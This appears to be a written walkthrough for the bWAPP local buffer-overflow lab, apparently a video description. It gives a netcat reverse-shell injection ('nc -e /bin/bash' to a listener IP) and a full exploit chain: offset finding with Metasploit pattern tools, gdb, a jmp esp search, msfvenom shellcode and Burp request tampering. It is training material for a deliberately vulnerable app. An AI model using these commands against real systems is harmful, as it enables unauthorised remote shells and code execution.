bWAPP Buffer Overflow local
Buffer Overflow (Local) - Low Security Level
Solution:
Step 1. Give a movie name as an input which is part of current bWAPP database and check the output.
(e.g. Hulk, Iron Man etc)
Give a movie name which is not part of the database and check the output.
(e.g. Time)
Check the source code of the lesson (Please follow steps as shown in the video).
Open bof_1.php document.
From the source code we understand that the title is given straight as a commandline argument to the app.
Step 2. To get the shell easy way, please use below command as shown in the video.
$(nc -e /bin/bash 10.0.2.4 4444) *Change the IP address to your BeeBox IP
Check the output.
Step 3. To get the shell hard way
Check the Hint given in the lesson page.
Let us crash the application by giving it a string from Metasploit's pattern_create.rb
a. Go to the command prompt and give command: locate pattern_create.rb
Output: You will get the path.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
b. Go the folder where the pattern_create.rb file is located
Use commands
cd /usr/share/metasploit-framework/tools/exploit/
ls -l
You can see the pattern_create.rb here
Now - execute the file pattern_create.rb
Commands: sudo ./pattern_create.rb (*Give password if necessary)
sudo ./pattern_create.rb -h
sudo ./pattern_create.rb -l 360
On executing the above command below output will be generated.
Save the output in beebox machine.
Step 4. Go to the beebox
Open Command Prompt and go to the Folder path: /var/www/html/bWAPP/apps
Use below command:
gdb --args ./movie_search "the output which you have saved" (Please refer video).
Note: I have already saved the command in beebox and using it directly.
Use below commands in beebox - gdb
run
info registers
Note eip register value got overwritten
Step 5. In your local machine
Give below commands
./pattern_offset.rb -q 0x41386c41
Check the Output - [*] Exact match at offset 354
In your beebox give below command (gdb) -
x/100cb $esp
Check the output - l 9 A m ...
In your local machine give below command
./pattern_offset.rb -q l9Am
Check the output - [*] Exact match at offset 358
In beebox open a new command prompt with path /var/www/bWAPP/apps# and use command:
objdump -D ./movie_search | grep jmp.*esp
Step 6. In your local machine generate payload with command:
Note: As angled brackets is not allowed in YouTube Description, replacing the angled bracket with ), kindly make necessary change
sudo msfvenom -p linux/x86/exec CMD=/bin/ps -b '\x00' -e x86/opt_sub -f raw ) /home/kali/Desktop/bofpayload.txt
Give password (*if necessary), wait patiently till the payload is generated.
Open new command prompt and go to the location where the file is saved and check the generated payload with command: cat bofpayload.txt
Regenerate the payload with below command:
(echo -n \'; cat /home/kali/Desktop/bofpayload.txt; echo -n \';) | perl -pe's/(.)/sprintf("%%%02X",ord($1))/seg'
Step 7. Go to the lesson page and check the HINT.
Let's use the HINT and make the exploit
Follow steps as shown in the video.
Step 8. Start BurpSuite
Turn on the proxy
Go to the lesson page and give any input of your choice in the search box and click on Search button.
Go to the BurpSuite replace the given input with our exploit.
Forward the request
Go to the lesson page and check the output
Explore the lesson further to get the reverse shell. (Not covered in this video).
PseudoTime
